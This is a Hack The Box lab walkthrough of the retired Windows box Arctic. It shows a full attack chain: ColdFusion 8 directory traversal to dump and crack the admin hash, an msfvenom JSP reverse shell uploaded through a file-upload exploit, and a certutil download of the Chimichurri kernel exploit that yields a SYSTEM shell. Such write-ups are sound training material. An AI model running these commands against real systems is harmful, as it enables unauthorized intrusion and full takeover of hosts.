HTB Walkthrough: Arctic w/o Metasploit (retired)
Arctic is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Arctic| Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ nmap -Pn -sC -sV -oA Arctic 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–14 13:25 EDT
Nmap scan report for 10.10.10.11
Host is up (0.026s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
FMTP (8500) is flight message protocol. Browsing to http://10.10.10.11:8500/ reveals a web page. If you browse to any cfc http://10.10.10.11:8500/CFIDE/adminapi/ , you will see that it is using Cold Fusion. (version 8)
http://10.10.10.11:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc
It requires admin credential. You will find admin portal at http://10.10.10.11:8500/CFIDE/administrator/
──(kali㉿kali)-[~]
└─$ searchsploit coldfusion
Adobe ColdFusion — Directory Traversal
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ searchsploit -m multiple/remote/14641.py
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ cp 14641.py pass.py
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ python pass.py 10.10.10.11 8500 ../../../../../../../lib/password.properties
trying /CFIDE/administrator/enter.cfmtitle from server in /CFIDE/administrator/enter.cfm:
— — — — — — — — — — — — — — —
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
— — — — — — — — — — — — — — —
The password is hashed. In order to get more info, the start of the script mentions the GET request performed to get the password with complete link.
Browse to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
You will see the same password output. View page source to see if there is an info about hash algorithm.
<form name=”loginform” action=”/CFIDE/administrator/enter.cfm” method=”POST” onSubmit=”cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value));” >
Let us try to decrypt sha1 from https://hashtoolkit.com
Decrypted Password: happyday
If you login to http://10.10.10.11:8500/CFIDE/administrator with the ‘happyday’ password, you will get in. There are other ways to exploit the admin portal but I instead used below method using searchsploit.
From searchsploit, ColdFusion 8.0 is vulnerable to Arbitrary file upload: ‘Adobe ColdFusion 2018 — Arbitrary File Upload’. Though there is no script available. Refer below link for the script:
https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload
Generate reverse shell using: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP> LPORT=9876 > shell.jsp
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ python rev.py 10.10.10.11 8500 shell.jsp/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload…
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp
Open a netcat session on kali (port 9876). Browse to http://10.10.10.11:8500/userfiles/file/exploit.jsp . You will get a reverse shell.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
On target machine, run ‘systeminfo’ command. Save the output in kali (systeminfo.txt).
┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py — update
[*] initiating winsploit version 3.3…
[+] writing to file 2021–04–20-mssb.xls
[*] doneNote: Install below dependency
┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ pip install xlrd==1.2.0┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py — systeminfo ~/labs/HTB/Arctic/systeminfo.txt -d 2021–04–20-mssb.xls[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as ‘Windows 2008 R2 64-bit’
[*]
[E] MS12–037: Cumulative Security Update for Internet Explorer (2699988) — Critical
[*] http://www.exploit-db.com/exploits/35273/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12–037), PoC
[*]
[E] MS11–011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) — Important
[E] MS10–059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) — Important
[E] MS10–047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) — Important
MS11–011 exploit did not work for me. There is no MS10–059 exploit in searchsploit. I found the exploit in https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe . Renaming the file to ‘exploit.exe’. [Note: You should not be running any file whose source code you cannot read.]
Transfering the file to target machine.
C:\Users\tolis\Documents>certutil -urlcache -f “http://<Kali IP>:8000/exploit.exe" exploit.exe
Run the exploit:
C:\Users\tolis\Documents>exploit.exe
exploit.exe
/Chimichurri/ →This exploit gives you a Local System shell <BR>/Chimichurri/ →Usage: Chimichurri.exe ipaddress port <BR>
Open a netcat session in kali (another window) on port 9987
C:\Users\tolis\Documents>exploit.exe <Kali IP> 9987
exploit.exe 10.10.XX.XX 9987
/Chimichurri/ →This exploit gives you a Local System shell <BR>/Chimichurri/ →Changing registry values…<BR>/Chimichurri/ →Got SYSTEM token…<BR>/Chimichurri/ →Running reverse shell…<BR>/Chimichurri/ →Restoring default registry values…<BR>
You should get a reverse shell.
C:\Users\tolis\Documents>whoami
whoami
nt authority\system
